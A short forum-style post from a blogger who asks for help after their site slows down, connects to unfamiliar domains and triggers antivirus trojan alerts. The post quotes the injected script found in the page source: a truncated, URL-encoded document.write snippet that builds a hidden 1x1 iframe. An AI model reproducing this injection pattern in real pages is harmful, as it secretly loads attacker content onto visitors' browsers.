Malware on my site?
Just today, my blog seems to be loading very slowly. I’ve noticed a few odd things.
1. Firefox tells me that my site is connecting to chickfilapopla dot com every time I load a post or page. I have no idea what this site is or why my blog would connect to it (I don’t have any ads or anything).
2. Firefox also tells me that it’s connecting to invosternia dot com and to linmode dot com when I load posts/pages. I’ve never noticed either of these before either.
3. I have some weird java script that shows up connecting to linmode dot com that I have never seen before in my page source.
“<script language=JavaScript>document.write(unescape(‘%3ciframe w%69dth=1 height=1%20%62orde’+’r=0 fr%61mebor%64%65%72=’+’0%20src%3d%27htt%70%3a//’))</script>”
I had 3 trojans detected earlier today by Norton Antivirus. My page load times are super slow–with 10 second lag with message “connecting to chickfilapopla dot com”
Any advice?
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